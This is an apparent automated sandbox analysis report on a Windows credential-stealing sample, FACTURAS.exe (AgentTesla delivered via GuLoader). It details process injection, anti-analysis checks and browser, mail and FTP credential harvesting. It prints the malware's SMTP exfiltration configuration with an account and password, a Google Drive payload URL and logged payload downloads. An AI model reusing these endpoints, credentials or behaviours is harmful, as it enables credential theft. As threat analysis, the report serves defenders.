Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:FACTURAS.exe
Analysis ID:527918
MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FACTURAS.exe (PID: 2936 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: AB63F9BA38D9EB4F8BD57AE56A844A31)
    • CasPol.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1028 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 5036 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id="}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2778328367.0000000002290000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 1028JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
            Source: UserOOBEBroker.exe.5036.21.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: FACTURAS.exeVirustotal: Detection: 27%Perma Link
            Source: FACTURAS.exeReversingLabs: Detection: 15%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_01175088 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_01175868 CryptUnprotectData,
            Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.11.20:49793 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 116.202.203.61 116.202.203.61
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-5k-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49806 -> 116.202.203.61:587
            Source: global trafficTCP traffic: 192.168.11.20:49806 -> 116.202.203.61:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351132420.000000001DE62000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351187881.000000001DE6A000.00000004.00000001.sdmpString found in binary or memory: http://8AH9aWyWzTn3yBDLZw.net
            Source: CasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmpString found in binary or memory: http://8AH9aWyWzTn3yBDLZw.nett-
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356922567.000000001FF72000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmpString found in binary or memory: http://furteksdokuma.com.tr
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://kFWRbv.com
            Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmpString found in binary or memory: http://mail.furteksdokuma.com.tr
            Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356922567.000000001FF72000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: UserOOBEBroker.exe, 00000015.00000002.7333160812.000001EB84730000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
            Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/_
            Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2754982414.0000000001043000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp
            Source: CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/y
            Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu
            Source: CasPol.exe, 0000000D.00000003.2751137585.000000000104A000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPuFdq1n8HLuvGi-fpP0
            Source: CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPuk
            Source: CasPol.exe, 0000000D.00000002.7350383503.000000001DDD8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 0000000D.00000002.7350383503.000000001DDD8000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-5k-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.11.20:49793 version: TLS 1.2
            Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004036BD
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00401538
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00401774
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00401727
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_008F0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_008F6988
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_008F1420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00931130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00933A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0093BA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00934320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0093C7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00933708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F28490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F2A9F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F28F20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F26270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F23330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_011719B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_01172DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_01177E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0117DED5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0117D2E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0117A940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0117A9A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013C50F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013C6C78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013C6048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013CA420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1DB95E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1DB946C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1DB95DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1DB96AF1
            Source: FACTURAS.exe, 00000000.00000000.2282400722.0000000000421000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
            Source: FACTURAS.exeBinary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
            Source: C:\Users\user\Desktop\FACTURAS.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dll
            Source: FACTURAS.exeVirustotal: Detection: 27%
            Source: FACTURAS.exeReversingLabs: Detection: 15%
            Source: FACTURAS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FACTURAS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\FACTURAS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURAS.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\FACTURAS.exeFile created: C:\Users\user\AppData\Local\Temp\~DF31A7F5A6505F20A0.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.2778328367.0000000002290000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004013B4 push FFFFFFCDh; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040204F push FFFFFFCDh; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004111C3 push ebp; ret
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004051D5 push 0340104Fh; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00403A4A push esi; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00402B0E push FFFFFFCDh; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00404C1F push eax; ret
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040BCD6 push 3CF881B8h; ret
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00413574 push 00000039h; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040A61E push D9EC50BBh; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040A739 push cs; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_02295AF5 push esi; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_02290B8A pushfd ; ret
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_022933FF push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00F22177 push edi; retn 0000h
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_013C3D0A push eax; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
